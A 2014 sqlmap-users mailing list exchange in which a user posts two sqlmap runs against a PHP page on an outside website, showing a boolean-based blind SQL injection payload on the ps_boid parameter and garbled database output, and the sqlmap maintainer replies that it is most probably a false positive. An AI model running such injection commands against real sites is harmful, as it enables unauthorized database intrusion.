Hi.
Most probably a false positive.
Bye
On Sat, May 3, 2014 at 11:02 PM, Dev <1240635...@qq.com> wrote:
> I can't figure out why this happens
>
>
>
>
> root@pk:~# sqlmap -u "http://www.net/m_view.php?ps_db=notice&ps_boid=149";
> --current-db
>
> sqlmap/1.0-dev-b54651b - automatic SQL injection and database takeover
> tool
> http://sqlmap.org
>
> [*] starting at 05:58:05
>
> [05:58:05] [INFO] resuming back-end DBMS 'mysql'
> [05:58:05] [INFO] testing connection to the target URL
> sqlmap identified the following injection points with a total of 0 HTTP(s)
> requests:
> ---
> Place: GET
> Parameter: ps_boid
> Type: boolean-based blind
> Title: AND boolean-based blind - WHERE or HAVING clause
> Payload: ps_db=notice&ps_boid=149) AND 4099=4099 AND (2004=2004
> ---
> [05:58:14] [INFO] the back-end DBMS is MySQL
> web application technology: PHP 4.4.9, Apache
> back-end DBMS: MySQL 4
> [05:58:14] [INFO] fetching current database
> [05:58:14] [INFO] resumed: \\?9e\\?9e\\?9e\\?9e\\?9e\\?9e\\?9e
> current database: '\?9e\?9e\?9e\?9e\?9e\?9e\?9e'
> [05:58:14] [INFO] fetched data logged to text files under
> '/usr/share/sqlmap/output/www.net'
>
> [*] shutting down at 05:58:14
>
> root@pk:~# sqlmap -u "http://www.net/m_view.php?ps_db=notice&ps_boid=149";
> --current-db
>
> sqlmap/1.0-dev-b54651b - automatic SQL injection and database takeover
> tool
> http://sqlmap.org
>
> [!] legal disclaimer: Usage of sqlmap for attacking targets without prior
> mutual consent is illegal. It is the end user's responsibility to obey all
> applicable local, state and federal laws. Developers assume no liability
> and are not responsible for any misuse or damage caused by this program
>
> [*] starting at 05:59:17
>
> [05:59:17] [INFO] resuming back-end DBMS 'mysql'
> [05:59:17] [INFO] testing connection to the target URL
> sqlmap identified the following injection points with a total of 0 HTTP(s)
> requests:
> ---
> Place: GET
> Parameter: ps_boid
> Type: boolean-based blind
> Title: AND boolean-based blind - WHERE or HAVING clause
> Payload: ps_db=notice&ps_boid=149) AND 4099=4099 AND (2004=2004
> ---
> [05:59:18] [INFO] the back-end DBMS is MySQL
> web application technology: PHP 4.4.9, Apache
> back-end DBMS: MySQL 4
> [05:59:18] [INFO] fetching current database
> [05:59:18] [INFO] resumed: \\?9e\\?9e\\?9e\\?9e\\?9e\\?9e\\?9e
> current database: '\?9e\?9e\?9e\?9e\?9e\?9e\?9e'
> [05:59:18] [INFO] fetched data logged to text files under
> '/usr/share/sqlmap/output/www.net'
>
> [*] shutting down at 05:59:18
>
> root@pk:~#
>
>
>
>
> ------------------------------------------------------------------------------
> "Accelerate Dev Cycles with Automated Cross-Browser Testing - For FREE
> Instantly run your Selenium tests across 300+ browser/OS combos. Get
> unparalleled scalability from the best Selenium testing platform available.
> Simple to use. Nothing to install. Get started now for free."
> http://p.sf.net/sfu/SauceLabs
> _______________________________________________
> sqlmap-users mailing list
> sqlmap-users@lists.sourceforge.net
> https://lists.sourceforge.net/lists/listinfo/sqlmap-users
>
>
--
Miroslav Stampar
http://about.me/stamparm
------------------------------------------------------------------------------
"Accelerate Dev Cycles with Automated Cross-Browser Testing - For FREE
Instantly run your Selenium tests across 300+ browser/OS combos. Get
unparalleled scalability from the best Selenium testing platform available.
Simple to use. Nothing to install. Get started now for free."
http://p.sf.net/sfu/SauceLabs
_______________________________________________
sqlmap-users mailing list
sqlmap-users@lists.sourceforge.net
https://lists.sourceforge.net/lists/listinfo/sqlmap-users
